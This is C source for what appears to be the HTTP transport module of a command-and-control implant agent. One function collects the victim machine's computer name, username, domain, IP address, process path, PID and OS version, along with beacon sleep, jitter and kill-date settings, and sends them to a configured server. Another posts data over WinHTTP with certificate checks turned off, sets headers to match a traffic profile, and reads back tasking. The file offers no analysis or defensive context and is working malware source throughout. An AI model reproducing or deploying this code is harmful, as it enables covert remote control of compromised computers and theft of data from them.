#include <Config.h> // the autogenerated file from compiling

#include <Mana.h>

#include <Transport.h>
#include <Command.h>
#include <Core.h>
#include <Apihashing.h>

#include <iptypes.h>
#include <iphlpapi.h>
#include <winternl.h>
#include <winhttp.h>

#define DATA_FREE( d, l ) \
    memset( d, 0, l ); \
    Api.LocalFree( d ); \
    d = NULL;

BOOL TransportInit( )
{
    PPACKAGE         Package    = NULL;
    BOOL             Success    = FALSE;
    PVOID            Data       = NULL;
    PIP_ADAPTER_INFO Adapter    = NULL;
    OSVERSIONINFOEXW OsVersions = { 0 };
    SIZE_T           Length     = 0;

    Package = PackageCreate( COMMAND_REGISTER );

    // Add data
    /*
        [ SIZE         ] 4 bytes
        [ Magic Value  ] 4 bytes
        [ Agent ID     ] 4 bytes
        [ COMMAND ID   ] 4 bytes
        [ Demon ID     ] 4 bytes
        [ User Name    ] size + bytes
        [ Host Name    ] size + bytes
        [ Domain       ] size + bytes
        [ IP Address   ] 16 bytes?
        [ Process Name ] size + bytes
        [ Process ID   ] 4 bytes
        [ Parent  PID  ] 4 bytes
        [ Process Arch ] 4 bytes
        [ Elevated     ] 4 bytes
        [ OS Info      ] ( 5 * 4 ) bytes
        [ OS Arch      ] 4 bytes
    */

    // Add AES Keys/IV
    //PackageAddPad( Package, Instance.Config.AES.Key, 32 );
    //PackageAddPad( Package, Instance.Config.AES.IV,  16 );

    // Add session id
    PackageAddInt32( Package, Instance.Session.AgentID );

    // Get Computer name
    if ( ! Api.GetComputerNameExA( ComputerNameNetBIOS, NULL, (LPDWORD) &Length ) ) {
        if ((Data = Api.LocalAlloc(LPTR, Length))) {
            Api.GetComputerNameExA(ComputerNameNetBIOS, Data, (LPDWORD) &Length);

        }
    }

    PackageAddBytes( Package, Data, Length );
    DATA_FREE( Data, Length );

    // Get Username
    Length = MAX_PATH;
    if ( ( Data = Api.LocalAlloc( LPTR, Length ) ) ){
        Api.GetUserNameA( Data, (LPDWORD) &Length );
    }

    PackageAddBytes( Package, Data, strlen( Data ) );
    DATA_FREE( Data, Length );

    // Get Domain
    if ( ! Api.GetComputerNameExA( ComputerNameDnsDomain, NULL, (LPDWORD) &Length ) ) {
        if ((Data = Api.LocalAlloc(LPTR, Length))) {
            Api.GetComputerNameExA(ComputerNameDnsDomain, Data, (LPDWORD) &Length);
        }
    }
    PackageAddBytes( Package, Data, Length );
    DATA_FREE( Data, Length );

    Api.GetAdaptersInfo( NULL, (PULONG) &Length );
    if ( ( Adapter = Api.LocalAlloc( LPTR, Length ) ) )
    {
        if ( Api.GetAdaptersInfo( Adapter, (PULONG) &Length ) == NO_ERROR )
        {
            PackageAddBytes( Package, Adapter->IpAddressList.IpAddress.String, strlen( Adapter->IpAddressList.IpAddress.String ) );

            memset( Adapter, 0, Length );
            Api.LocalFree( Adapter );
            Adapter = NULL;
        }

        else {
            PackageAddInt32(Package, 0);
        }
    } else {
        PackageAddInt32(Package, 0);
    }


    Length = MAX_PATH;
    if ( ( Data = Api.LocalAlloc( LPTR, Length ) ) )
    {
        Length = Api.GetModuleFileNameA( NULL, Data, Length );
        PackageAddBytes( Package, Data, Length );
    } else { PackageAddInt32( Package, 0 ); }

    PackageAddInt32( Package, Api.GetCurrentProcessId() );
    PackageAddInt32( Package, (DWORD) 0 );
    PackageAddInt32( Package, Instance.Session.ProcArch );
    PackageAddInt32( Package, FALSE ); // default

    memset( &OsVersions, 0, sizeof( OsVersions ) );
    OsVersions.dwOSVersionInfoSize = sizeof( OsVersions );
    Instance.Win32.RtlGetVersion( &OsVersions );

    PackageAddInt32( Package, OsVersions.dwMajorVersion );
    PackageAddInt32( Package, OsVersions.dwMinorVersion );
    PackageAddInt32( Package, OsVersions.wProductType );
    PackageAddInt32( Package, OsVersions.wServicePackMajor );
    PackageAddInt32( Package, OsVersions.dwBuildNumber );

    PackageAddInt32( Package, Instance.Session.OSArch );
    PackageAddInt32( Package, Instance.Config.Sleeping );
    PackageAddInt32( Package, Instance.Config.Jitter );
    PackageAddInt32( Package, Instance.Config.Transport.KillDate );
    PackageAddInt32( Package, Instance.Config.Transport.WorkingHours );
    // End of Options

    PRINT_HEX( Data, Length )

    if ( PackageTransmit( Package, &Data, &Length ) )
    {
        printf("TRANSMITTED PACKAGE!\n");
        PRINT_HEX( Data, Length )

        if ( Data )
        {
            printf( "Agent => %x : %x\n", ( UINT32 ) DEREF( Data ), ( UINT32 ) Instance.Session.AgentID );
            if ( ( UINT32 ) Instance.Session.AgentID == ( UINT32 ) DEREF( Data ) )
            {
                printf("CONNECTED!\n");
                Instance.Session.Connected = TRUE;
                Success = TRUE;
            }
        }
        else
        {
            Success = FALSE;
        }
    }

    return Success;
}

BOOL TransportSend( LPVOID Data, SIZE_T Size, PVOID* RecvData, PSIZE_T RecvSize )
{
    HANDLE  hConnect        = NULL;
    HANDLE  hSession        = NULL;
    HANDLE  hRequest        = NULL;
    LPWSTR  HttpEndpoint    = NULL;
    LPWSTR  HttpHeaders    = NULL;
    DWORD   HttpFlags       = 0;
    DWORD   HttpAccessType  = 0;
    LPCWSTR HttpProxy       = NULL;
    DWORD   BufRead         = 0;
    UCHAR   Buffer[ 1024 ]  = { 0 };
    PVOID   RespBuffer      = NULL;
    SIZE_T  RespSize        = 0;
    BOOL    Successful      = FALSE;



    //create session
    hSession = Api.WinHttpOpen( Instance.Config.Transport.UserAgent, HttpAccessType, HttpProxy, WINHTTP_NO_PROXY_BYPASS, 0 );
    if ( ! hSession )
    {
        printf( "WinHttpOpen: Failed => %d\n", Api.GetLastError() );
        Successful = FALSE;
        goto LEAVE;
    }

    hConnect = Api.WinHttpConnect( hSession, Instance.Config.Transport.Host, Instance.Config.Transport.Port, 0 );
    printf( "> WinHttpConnect=> %d\n", Api.GetLastError() );
    if ( ! hConnect )
    {
        printf( "WinHttpConnect: Failed => %d\n", Api.GetLastError() );
        Successful = FALSE;
        goto LEAVE;
    }

    HttpFlags    = WINHTTP_FLAG_BYPASS_PROXY_CACHE;

    if ( Instance.Config.Transport.Secure ){
        HttpFlags |= WINHTTP_FLAG_SECURE;
    }

    // make a post request
    hRequest = Api.WinHttpOpenRequest(
        hConnect,
        L"POST",
        CONFIG_ENDPOINT,
        NULL,
        WINHTTP_NO_REFERER,
        WINHTTP_DEFAULT_ACCEPT_TYPES,
        HttpFlags
    );
    printf( "> WinHttpOpenRequest=> %d\n", Api.GetLastError() );

    if ( ! hRequest )
    {
        printf( "WinHttpOpenRequest: Failed => %d\n", Api.GetLastError() );
        return FALSE;
    }

    if ( Instance.Config.Transport.Secure )
    {
        HttpFlags = SECURITY_FLAG_IGNORE_UNKNOWN_CA        |
                    SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
                    SECURITY_FLAG_IGNORE_CERT_CN_INVALID   |
                    SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE;

        if ( ! Api.WinHttpSetOption( hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &HttpFlags, sizeof( DWORD ) ) )
        {
            printf( "WinHttpSetOption: Failed => %d\n", Api.GetLastError() );
        }else{
            printf( "> WinHttpSetOption => %d\n", Api.GetLastError() );

        }
    }

    
    // Set headers to match profile
    for (INT i = 0; i < CONFIG_HEADER_COUNT; i++) {
        Api.WinHttpAddRequestHeaders(
            hRequest,
            CONFIG_HEADERS[i],
            -1,
            WINHTTP_ADDREQ_FLAG_ADD
        );
    }
    


    if ( Api.WinHttpSendRequest( hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, Data, Size, Size, 0x0 ) )
    {
        if ( RecvData && Api.WinHttpReceiveResponse( hRequest, NULL ) )
        {
            RespBuffer = NULL;
            do
            {
                Successful = Api.WinHttpReadData( hRequest, Buffer, 1024, &BufRead );
                if ( ! Successful || BufRead == 0 )
                {
                    if ( ! Successful )
                        printf( "WinHttpReadData: Failed (%d)\n", Api.GetLastError() );
                    break;
                }

                if ( ! RespBuffer )
                    RespBuffer = Api.LocalAlloc( LPTR, BufRead );
                else
                    RespBuffer = Api.LocalReAlloc( RespBuffer, RespSize + BufRead, LMEM_MOVEABLE | LMEM_ZEROINIT );

                RespSize += BufRead;

                memcpy( RespBuffer + ( RespSize - BufRead ), Buffer, BufRead );
                memset( Buffer, 0, 1024 );

            } while ( Successful == TRUE );

            if ( RecvSize )
                *RecvSize = RespSize;

            if ( RecvData )
                *RecvData = RespBuffer;

            Successful = TRUE;
        }
    }
    else
    {
        if ( Api.GetLastError() == 12029 ) { // ERROR_INTERNET_CANNOT_CONNECT
            Instance.Session.Connected = FALSE;
        }else {
            printf("WinHttpSendRequest: Failed => %d\n", Api.GetLastError());
        }
        Successful = FALSE;
        goto LEAVE;
    }

LEAVE:
    Api.WinHttpCloseHandle( hSession );
    Api.WinHttpCloseHandle( hConnect );
    Api.WinHttpCloseHandle( hRequest );

    return Successful;
}

